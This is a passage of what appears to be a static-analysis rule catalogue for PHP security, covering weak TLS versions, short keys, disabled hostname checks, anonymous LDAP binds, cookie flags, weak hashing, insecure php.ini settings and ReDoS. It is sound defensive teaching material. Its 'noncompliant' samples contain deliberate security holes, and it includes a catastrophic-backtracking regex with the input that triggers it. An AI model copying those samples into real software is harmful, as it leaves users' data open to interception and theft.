    Yii::$app->security->encryptByPassword($data, $password); // Sensitive
    Yii::$app->getSecurity()->encryptByPassword($data, $password); // Sensitive
}

Zend

use Zend\Crypt\FileCipher;
use Zend\Crypt\PublicKey\DiffieHellman;
use Zend\Crypt\PublicKey\Rsa;
use Zend\Crypt\Hybrid;
use Zend\Crypt\BlockCipher;

function myZendEncrypt($key, $data, $prime, $options, $generator, $lib)
{
    new FileCipher; // Sensitive. This is used to encrypt files

    new DiffieHellman($prime, $generator, $key); // Sensitive

    $rsa = Rsa::factory([ // Sensitive
        'public_key'    => 'public_key.pub',
        'private_key'   => 'private_key.pem',
        'pass_phrase'   => 'mypassphrase',
        'binary_output' => false,
    ]);
    $rsa->encrypt($data); // No issue raised here. The configuration of the Rsa object is the line to review.

    $hybrid = new Hybrid(); // Sensitive

    BlockCipher::factory($lib, $options); // Sensitive
}

See

php:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Core PHP

Code examples

Noncompliant code example

$opts = array(
  'ssl' => [
    'crypto_method' => STREAM_CRYPTO_METHOD_TLSv1_1_CLIENT // Noncompliant
  ],
  'http'=>array(
    'method'=>"GET"
  )
);

$context = stream_context_create($opts);

$fp = fopen('https://www.example.com', 'r', false, $context);
fpassthru($fp);
fclose($fp);

Compliant solution

$opts = array(
  'ssl' => [
    'crypto_method' => STREAM_CRYPTO_METHOD_TLSv1_2_CLIENT
  ],
  'http'=>array(
    'method'=>"GET"
  )
);

$context = stream_context_create($opts);

$fp = fopen('https://www.example.com', 'r', false, $context);
fpassthru($fp);
fclose($fp);

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS V1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older cipher suites that are now considered insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.
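
With the cURL extension, the minimum protocol version can be pinned explicitly (a sketch; the URL is a placeholder):

```php
<?php
$ch = curl_init('https://www.example.com');
// Refuse any protocol older than TLS v1.2.
curl_setopt($ch, CURLOPT_SSLVERSION, CURL_SSLVERSION_TLSv1_2);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
```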

Resources

Articles & blog posts

Standards

php:S3337

Why is this an issue?

enable_dl is on by default and allows open_basedir restrictions, which limit the files a script can access, to be ignored. For that reason, it’s a dangerous option and should be explicitly turned off.

This rule raises an issue when enable_dl is not explicitly set to 0 in php.ini.

Noncompliant code example

; php.ini
enable_dl=1  ; Noncompliant

Compliant solution

; php.ini
enable_dl=0

Resources

php:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)
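As a sketch of such a derivation, PHP’s built-in hash_pbkdf2() can stretch a passphrase into an AES key. The passphrase, salt size, and iteration count below are illustrative values only:

```php
<?php
// Sketch: deriving a 256-bit AES key from a passphrase with PBKDF2.
// In practice the salt must be random and stored for later re-derivation.
$passphrase = 'correct horse battery staple'; // hypothetical secret
$salt       = random_bytes(16);
$iterations = 100000;

// Request 32 raw bytes (256 bits), suitable as an AES-256 key.
$key = hash_pbkdf2('sha256', $passphrase, $salt, $iterations, 32, true);
```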

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Core PHP

Code examples

Noncompliant code example

Here is an example of a private key generation with RSA:

$config = [
    "digest_alg"       => "sha512",
    "private_key_bits" => 1024,                 // Noncompliant
    "private_key_type" => OPENSSL_KEYTYPE_RSA,
];

$res = openssl_pkey_new($config);

Compliant solution

$config = [
    "digest_alg"       => "sha512",
    "private_key_bits" => 2048,
    "private_key_type" => OPENSSL_KEYTYPE_RSA,
];

$res = openssl_pkey_new($config);

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.
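For illustration, here is a minimal sketch of using a 256-bit key with PHP’s OpenSSL bindings in an authenticated mode; the key, IV, and plaintext are placeholder values:

```php
<?php
// Sketch: authenticated encryption with a 256-bit AES key in GCM mode.
// The IV must be unique per message encrypted under the same key.
$key       = random_bytes(32); // 256-bit key
$iv        = random_bytes(12); // 96-bit IV, recommended for GCM
$plaintext = 'example payload';

$ciphertext = openssl_encrypt($plaintext, 'aes-256-gcm', $key,
                              OPENSSL_RAW_DATA, $iv, $tag);
$decrypted  = openssl_decrypt($ciphertext, 'aes-256-gcm', $key,
                              OPENSSL_RAW_DATA, $iv, $tag);
```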

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of keys generated with elliptic curve algorithms is mentioned directly in their names. For example, secp256k1 generates a 256-bit private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.
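As a sketch, an EC key above that minimum can be generated with openssl_pkey_new(); the curve name below (prime256v1, i.e. NIST P-256) is one common choice, not the only valid one:

```php
<?php
// Sketch: generating an EC private key on a 256-bit curve with OpenSSL.
$config = [
    'private_key_type' => OPENSSL_KEYTYPE_EC,
    'curve_name'       => 'prime256v1', // 256 bits, above the 224-bit minimum
];
$res     = openssl_pkey_new($config);
$details = openssl_pkey_get_details($res);
// $details['bits'] reports the curve size, here 256.
```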

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterparts.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.


Resources

Articles & blog posts

Standards

php:S3334

Why is this an issue?

allow_url_fopen and allow_url_include allow code to be read into a script from URLs. The ability to pull in executable code from outside your site, coupled with imperfect input cleansing, could lay your site bare to attackers. Even if your input filtering is perfect today, are you prepared to bet your site that it will always be perfect in the future?

This rule raises an issue when either property is explicitly enabled in php.ini and when allow_url_fopen, which defaults to enabled, is not explicitly disabled.

Noncompliant code example

; php.ini  Noncompliant; allow_url_fopen not explicitly disabled
allow_url_include=1  ; Noncompliant

Compliant solution

; php.ini
allow_url_fopen=0
allow_url_include=0

Resources

php:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

As the rand() and mt_rand() functions rely on a pseudorandom number generator, they should not be used for security-critical applications or for protecting sensitive data.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. This is the case for all encryption mechanisms, and whenever a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use functions which rely on a cryptographically strong random number generator, such as random_int(), random_bytes(), or openssl_random_pseudo_bytes()
  • When using openssl_random_pseudo_bytes(), provide and check the crypto_strong parameter
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

$random = rand();
$random2 = mt_rand(0, 99);

Compliant Solution

$randomInt = random_int(0,99); // Compliant; generates a cryptographically secure random integer
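The other recommended functions can be used in the same spirit; here is a minimal sketch with illustrative variable names, including the crypto_strong check mentioned above:

```php
<?php
// Sketch: cryptographically secure alternatives to rand()/mt_rand().
$token = bin2hex(random_bytes(16)); // 32 hex chars, e.g. for a reset token
$dice  = random_int(1, 6);          // unbiased integer in [1, 6]

// With openssl_random_pseudo_bytes(), check the crypto_strong flag.
$bytes = openssl_random_pseudo_bytes(16, $cryptoStrong);
if ($cryptoStrong !== true) {
    throw new RuntimeException('CSPRNG unavailable');
}
```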

See

php:S3335

Why is this an issue?

The cgi.force_redirect php.ini configuration is on by default, and it prevents unauthenticated access to scripts when PHP is running as a CGI. Unfortunately, it must be disabled on IIS, OmniHTTPD and Xitami, but in all other cases it should be on.

This rule raises an issue when cgi.force_redirect is explicitly disabled.

Noncompliant code example

; php.ini
cgi.force_redirect=0  ; Noncompliant

Resources

php:S3332

This rule is deprecated, and will eventually be removed.

Why is this an issue?

Cookies without fixed lifetimes or expiration dates are known as non-persistent, or "session" cookies, meaning they last only as long as the browser session, and poof away when the browser closes. Cookies with expiration dates, "persistent" cookies, are stored/persisted until those dates.

Non-persistent cookies should be used for the management of logged-in sessions on web sites. To make a cookie non-persistent, simply omit the expires attribute.

This rule raises an issue when expires is set for a session cookie, either programmatically or via configuration, such as session.cookie_lifetime.
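A minimal sketch of a non-persistent cookie, with a placeholder name and value; passing 0 as the expires argument is equivalent to omitting it:

```php
<?php
// Sketch: a non-persistent ("session") cookie. An expires value of 0
// (the default) means the cookie lasts only for the browser session.
$token = bin2hex(random_bytes(16)); // illustrative session token
setcookie('SESSIONTOKEN', $token, 0, '/', '', true, true);
```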

Resources

php:S3333

Why is this an issue?

The open_basedir configuration in php.ini limits the files the script can access using, for example, include and fopen(). Leave it out, and there is no default limit, meaning that any file can be accessed. Include it, and PHP will refuse to access files outside the allowed path.

open_basedir should be configured with a directory, which will then be accessible recursively. However, the use of . (current directory) as an open_basedir value should be avoided since it’s resolved dynamically during script execution, so a chdir('/') command could lay the whole server open to the script.

This is not a fool-proof configuration; it can be reset or overridden at the script level. But its use should be seen as a minimum due diligence step. This rule raises an issue when open_basedir is not present in php.ini, and when open_basedir contains root, or the current directory (.) symbol.

Noncompliant code example

; php.ini try 1
; open_basedir="${USER}/scripts/data"  Noncompliant; commented out

; php.ini try 2
open_basedir="/:${USER}/scripts/data"  ; Noncompliant; root directory in the list

Compliant solution

; php.ini try 1
open_basedir="${USER}/scripts/data"

Resources

php:S3330

When a cookie is configured with the HttpOnly attribute set to true, the browser guarantees that no client-side script will be able to read it. In most cases, when a cookie is created, the default value of HttpOnly is false and it’s up to the developer to decide whether or not the content of the cookie can be read by the client-side script. As a majority of Cross-Site Scripting (XSS) attacks target the theft of session-cookies, the HttpOnly attribute can help to reduce their impact as it won’t be possible to exploit the XSS vulnerability to steal session-cookies.

Ask Yourself Whether

  • the cookie is sensitive, used to authenticate the user, for instance a session-cookie
  • the HttpOnly attribute offers an additional protection (this is not the case for an XSRF-TOKEN cookie / CSRF token, for example)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • By default the HttpOnly flag should be set to true for most cookies, and it’s mandatory for session / sensitive-security cookies.

Sensitive Code Example

In php.ini you can specify the flags for the session cookie which is security-sensitive:

session.cookie_httponly = 0  ; Sensitive: this sensitive session cookie is created with the httponly flag set to false and so it can be stolen easily in case of XSS vulnerability

Same thing in PHP code:

session_set_cookie_params($lifetime, $path, $domain, true, false);  // Sensitive: this sensitive session cookie is created with the httponly flag (the fifth argument) set to false and so it can be stolen easily in case of XSS vulnerability

If you create a custom security-sensitive cookie in your PHP code:

$value = "sensitive data";
setcookie($name, $value, $expire, $path, $domain, true, false); // Sensitive: this sensitive cookie is created with the httponly flag (the seventh argument) set to false and so it can be stolen easily in case of XSS vulnerability

By default, the setcookie and setrawcookie functions set the httpOnly flag (the seventh argument) to false, so cookies can be stolen easily in case of an XSS vulnerability:

$value = "sensitive data";
setcookie($name, $value, $expire, $path, $domain, true); // Sensitive: a sensitive cookie is created with the httponly flag (the seventh argument) not defined (by default set to false)
setrawcookie($name, $value, $expire, $path, $domain, true); // Sensitive: a sensitive cookie is created with the httponly flag (the seventh argument) not defined (by default set to false)

Compliant Solution

session.cookie_httponly = 1  ; Compliant: the sensitive cookie is protected against theft (cookie_httponly=1)
session_set_cookie_params($lifetime, $path, $domain, true, true); // Compliant: the sensitive cookie is protected against theft thanks to the fifth argument set to true (HttpOnly=true)
$value = "sensitive data";
setcookie($name, $value, $expire, $path, $domain, true, true); // Compliant: the sensitive cookie is protected against theft thanks to the seventh argument set to true (HttpOnly=true)
setrawcookie($name, $value, $expire, $path, $domain, true, true); // Compliant: the sensitive cookie is protected against theft thanks to the seventh argument set to true (HttpOnly=true)

See

php:S4784

This rule is deprecated; use S2631 instead.

Using regular expressions is security-sensitive. It has led in the past to the following vulnerabilities:

Evaluating regular expressions against input strings is potentially an extremely CPU-intensive task. Specially crafted regular expressions such as /(a+)+s/ will take several seconds to evaluate the input string aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabs. The problem is that with every additional a character added to the input, the time required to evaluate the regex doubles. However, the equivalent regular expression, a+s (without grouping) is efficiently evaluated in milliseconds and scales linearly with the input size.

Evaluating such regular expressions opens the door to Regular expression Denial of Service (ReDoS) attacks. In the context of a web application, attackers can force the web server to spend all of its resources evaluating regular expressions thereby making the service inaccessible to genuine users.

This rule flags any execution of a hardcoded regular expression which has at least 3 characters and contains at least two instances of any of the following characters: *+{

Example: (a+)*

The following functions are detected as executing regular expressions:

Note that ereg* functions have been removed in PHP 7 and PHP 5 end of life date is the 1st of January 2019. Using PHP 5 is dangerous as there will be no security fix.

This rule’s goal is to guide security code reviews.

Ask Yourself Whether

  • the executed regular expression is sensitive and a user can provide a string which will be analyzed by this regular expression.
  • your regular expression engine’s performance decreases with specially crafted inputs and regular expressions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not set the constant pcre.backtrack_limit to a high value as it will increase the resource consumption of PCRE functions.

Check the error codes of PCRE functions via preg_last_error.

Check whether your regular expression engine (the algorithm executing your regular expression) has any known vulnerabilities. Search for vulnerability reports mentioning the engine you are using. Do not run vulnerable regular expressions on user input.

If possible, use a library which is not vulnerable to ReDoS attacks, such as Google RE2.

Remember also that a ReDoS attack is possible if a user-provided regular expression is executed. This rule won’t detect this kind of injection.

Avoid executing a user input string as a regular expression or use at least preg_quote to escape regular expression characters.
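A small sketch of the preg_quote() approach; the input string is illustrative:

```php
<?php
// Sketch: escaping user input with preg_quote() so that regex
// metacharacters are matched literally instead of interpreted.
$userInput = 'a+b(c)';                    // hypothetical user-supplied string
$escaped   = preg_quote($userInput, '/'); // second arg also escapes the delimiter
$found     = preg_match('/' . $escaped . '/', 'value: a+b(c)');
```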

Exceptions

An issue will be created for the functions mb_ereg_search_pos, mb_ereg_search_regs and mb_ereg_search if and only if at least the first argument, i.e. the $pattern, is provided.

The current implementation does not follow variables. It will only detect regular expressions hard-coded directly in the function call.

$pattern = "/(a+)+/";
$result = eregi($pattern, $input);  // No issue will be raised even if it is Sensitive

Some corner-case regular expressions will not raise an issue even though they might be vulnerable. For example: (a|aa)+, (a|a?)+.

It is a good idea to test your regular expression if it contains the same pattern on both sides of a "|".

See

php:S3331

This rule is deprecated, and will eventually be removed.

A cookie’s domain specifies which websites should be able to read it. If it is left blank, browsers are supposed to send the cookie only to sites that exactly match the sending domain. For example, if a cookie was set by lovely.dream.com, it should only be readable by that domain, and not by nightmare.com or even strange.dream.com. If you want to allow sub-domain access for a cookie, you can specify it by adding a dot in front of the cookie’s domain, like so: .dream.com. But cookie domains should always use at least two levels.

Cookie domains can be set either programmatically or via configuration. This rule raises an issue when any cookie domain is set with a single level, as in .com.

Ask Yourself Whether

  • the domain attribute has only one level of domain naming.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

  • You should check that the domain attribute has been set and that its value has more than one level of domain naming, like: sonarsource.com

Sensitive Code Example

setcookie("TestCookie", $value, time()+3600, "/~path/", ".com", 1); // Noncompliant
session_set_cookie_params(3600, "/~path/", ".com"); // Noncompliant

// inside php.ini
session.cookie_domain=".com"; // Noncompliant

Compliant Solution

setcookie("TestCookie", $value, time()+3600, "/~path/", ".myDomain.com", 1);
session_set_cookie_params(3600, "/~path/", ".myDomain.com");

// inside php.ini
session.cookie_domain=".myDomain.com";

See

php:S3338

This rule is deprecated, and will eventually be removed.

Why is this an issue?

file_uploads is an on-by-default PHP configuration that allows files to be uploaded to your site. Since accepting files from strangers is inherently dangerous, this feature should be disabled unless it is absolutely necessary for your site.

This rule raises an issue when file_uploads is not explicitly disabled.

Noncompliant code example

; php.ini
file_uploads=1  ; Noncompliant

Compliant solution

; php.ini
file_uploads=0

Resources

php:S2255

This rule is deprecated, and will eventually be removed.

Using cookies is security-sensitive. It has led in the past to the following vulnerabilities:

Attackers can use widely-available tools to read cookies. Any sensitive information they may contain will be exposed.

This rule flags code that writes cookies.

Ask Yourself Whether

  • sensitive information is stored inside the cookie.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Cookies should only be used to manage the user session. The best practice is to keep all user-related information server-side and link it to the user session, never sending it to the client. In a few corner cases, cookies can be used for non-sensitive information that needs to live longer than the user session.

Do not try to encode sensitive information in a non-human-readable format before writing it in a cookie. The encoding can be reverted and the original information will be exposed.

Using cookies only for session IDs doesn’t make them secure. Follow OWASP best practices when you configure your cookies.

As a side note, every piece of information read from a cookie should be sanitized.

Sensitive Code Example

$value = "1234 1234 1234 1234";

// Review this cookie as it seems to send sensitive information (credit card number).
setcookie("CreditCardNumber", $value, $expire, $path, $domain, true, true); // Sensitive
setrawcookie("CreditCardNumber", $value, $expire, $path, $domain, true, true); // Sensitive

See

php:S4433

Lightweight Directory Access Protocol (LDAP) servers provide two main authentication methods: the SASL and Simple ones. The Simple Authentication method also breaks down into three different mechanisms:

  • Anonymous Authentication
  • Unauthenticated Authentication
  • Name/Password Authentication

A server that accepts either the Anonymous or Unauthenticated mechanisms will accept connections from clients not providing credentials.

Why is this an issue?

When configured to accept the Anonymous or Unauthenticated authentication mechanism, an LDAP server will accept connections from clients that do not provide a password or other authentication credentials. Such users will be able to read or modify part or all of the data contained in the hosted directory.

What is the potential impact?

An attacker exploiting unauthenticated access to an LDAP server can access the data that is stored in the corresponding directory. The impact varies depending on the permission obtained on the directory and the type of data it stores.

Authentication bypass

If attackers get write access to the directory, they will be able to alter most of the data it stores. This might include sensitive technical data such as user passwords or asset configurations. Such an attack can typically lead to an authentication bypass on applications and systems that use the affected directory as an identity provider.

In such a case, all users configured in the directory might see their identity and privileges taken over.

Sensitive information leak

If attackers get read-only access to the directory, they will be able to read the data it stores. That data might include security-sensitive pieces of information.

Typically, attackers might get access to user account lists that they can use in further intrusion steps. For example, they could use such lists to perform password spraying, or related attacks, on all systems that rely on the affected directory as an identity provider.

If the directory contains some Personally Identifiable Information, an attacker accessing it might represent a violation of regulatory requirements in some countries. For example, this kind of security event would go against the European GDPR regulation.

How to fix it

Code examples

The following code indicates an anonymous LDAP authentication vulnerability because it binds to a remote server using an Anonymous Simple authentication mechanism.

Noncompliant code example

$ldapconn = ldap_connect("ldap.example.com");

if ($ldapconn) {
    $ldapbind = ldap_bind($ldapconn); // Noncompliant
}

Compliant solution

$ldaprdn  = 'uname';
$ldappass = 'password';

$ldapconn = ldap_connect("ldap.example.com");

if ($ldapconn) {
    $ldapbind = ldap_bind($ldapconn, $ldaprdn, $ldappass); // Compliant
}

Resources

Documentation

Standards

php:S5527

This vulnerability allows attackers to impersonate a trusted host.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. In this process, the role of hostname validation, combined with certificate validation, is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When hostname validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

To do so, an attacker would obtain a valid certificate authenticating example.com, serve it using a different hostname, and the application code would still accept it.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable hostname validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate hostnames, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

How to fix it in cURL

Code examples

The following code contains examples of disabled hostname validation.

Hostname validation is disabled by setting CURLOPT_SSL_VERIFYHOST to 0 or false. To enable validation, set the value to 2 or true, or do not set CURLOPT_SSL_VERIFYHOST at all so that the secure default value is used.

Noncompliant code example

$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, 'https://example.com/');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);  // Noncompliant
curl_exec($curl);
curl_close($curl);

Compliant solution

$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, 'https://example.com/');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);
curl_exec($curl);
curl_close($curl);

How does this work?

To fix the vulnerability of disabled hostname validation, it is strongly recommended to first re-enable the default validation and fix the root cause: the validity of the certificate.

Use valid certificates

If a hostname validation failure prevents connecting to the target server, keep in mind that one system’s code should not work around another system’s problems, as this creates unnecessary dependencies and can lead to reliability issues.

Therefore, the first solution is to change the remote host’s certificate to match its identity. If the remote host is not under your control, consider replicating its service to a server whose certificate you can change yourself.

In case the contacted host is located on a development machine, and if there is no other choice, try following this solution:

  • Create a self-signed certificate for that machine.
  • Add this self-signed certificate to the system’s trust store.
  • If the hostname is not localhost, add the hostname in the /etc/hosts file.
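As an aside, such a development self-signed certificate can even be produced from PHP itself with the OpenSSL extension. This is a sketch only; the DN values and lifetime are placeholders, and command-line openssl is an equally valid route:

```php
<?php
// Sketch: generating a self-signed certificate for a development host.
$dn      = ['commonName' => 'dev.local']; // placeholder distinguished name
$privKey = openssl_pkey_new([
    'private_key_bits' => 2048,
    'private_key_type' => OPENSSL_KEYTYPE_RSA,
]);
$csr  = openssl_csr_new($dn, $privKey);
$cert = openssl_csr_sign($csr, null, $privKey, 365); // null CA = self-signed
openssl_x509_export($cert, $pem); // PEM string, ready for the trust store
```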

Resources

Standards

php:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, and SHA-3, are recommended. For password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2, because this slows down brute-force attacks.

Sensitive Code Example

$hash = md5($data); // Sensitive
$hash = sha1($data);   // Sensitive

Compliant Solution

// for a password
$hash = password_hash($password, PASSWORD_BCRYPT); // Compliant

// other context
$hash = hash("sha512", $data);
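For completeness, a hash stored with password_hash() is later checked with password_verify(); here is a sketch with an illustrative password value:

```php
<?php
// Sketch: hashing and verifying a password with PHP's built-in API.
$password = 's3cr3t-passphrase'; // illustrative value
$hash     = password_hash($password, PASSWORD_BCRYPT);

$ok  = password_verify($password, $hash);     // true for the right password
$bad = password_verify('wrong-guess', $hash); // false otherwise
```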

See

php:S4792

Configuring loggers is security-sensitive. It has led in the past to the following vulnerabilities:

Logs are useful before, during and after a security incident.

  • Attackers will most of the time start their nefarious work by probing the system for vulnerabilities. Monitoring this activity and stopping it is the first step to prevent an attack from ever happening.
  • In case of a successful attack, logs should contain enough information to understand what damage an attacker may have inflicted.

Logs are also a target for attackers because they might contain sensitive information. Configuring loggers has an impact on the type of information logged and on how it is logged.

This rule flags for review code that initiates loggers configuration. The goal is to guide security code reviews.

Ask Yourself Whether

  • unauthorized users might have access to the logs, either because they are stored in an insecure location or because the application gives access to them.
  • the logs contain sensitive information on a production server. This can happen when the logger is in debug mode.
  • the log can grow without limit. This can happen when additional information is written into logs every time a user performs an action and the user can perform the action as many times as they want.
  • the logs do not contain enough information to understand the damage an attacker might have inflicted. The loggers mode (info, warn, error) might filter out important information. They might not print contextual information like the precise time of events or the server hostname.
  • the logs are only stored locally instead of being backed up or replicated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Check that your production deployment doesn’t have its loggers in "debug" mode as it might write sensitive information in logs.
  • Production logs should be stored in a secure location which is only accessible to system administrators.
  • Configure the loggers to display all warnings, info and error messages. Write relevant information such as the precise time of events and the hostname.
  • Choose log format which is easy to parse and process automatically. It is important to process logs rapidly in case of an attack so that the impact is known and limited.
  • Check that the permissions of the log files are correct. If you index the logs in some other service, make sure that the transfer and the service are secure too.
  • Add limits to the size of the logs and make sure that no user can fill the disk with logs. This can happen even when the user does not control the logged information. An attacker could just repeat a logged action many times.

Remember that configuring loggers properly doesn’t make them bullet-proof. Here is a list of recommendations explaining how to use your logs:

  • Don’t log any sensitive information. This obviously includes passwords and credit card numbers but also any personal information such as user names, locations, etc…​ Usually, any information which is protected by law is a good candidate for removal.
  • Sanitize all user inputs before writing them in the logs. This includes checking their size, content, encoding, syntax, etc…​ As for any user input, validate using whitelists whenever possible. Enabling users to write what they want in your logs can have many impacts. It could for example use all your storage space or compromise your log indexing service.
  • Log enough information to monitor suspicious activities and evaluate the impact an attacker might have on your systems. Register events such as failed logins, successful logins, server side input validation failures, access denials and any important transaction.
  • Monitor the logs for any suspicious activity.

Sensitive Code Example

Basic PHP configuration:

function configure_logging() {
  error_reporting(E_RECOVERABLE_ERROR); // Sensitive
  error_reporting(32); // Sensitive

  ini_set('docref_root', '1'); // Sensitive
  ini_set('display_errors', '1'); // Sensitive
  ini_set('display_startup_errors', '1'); // Sensitive
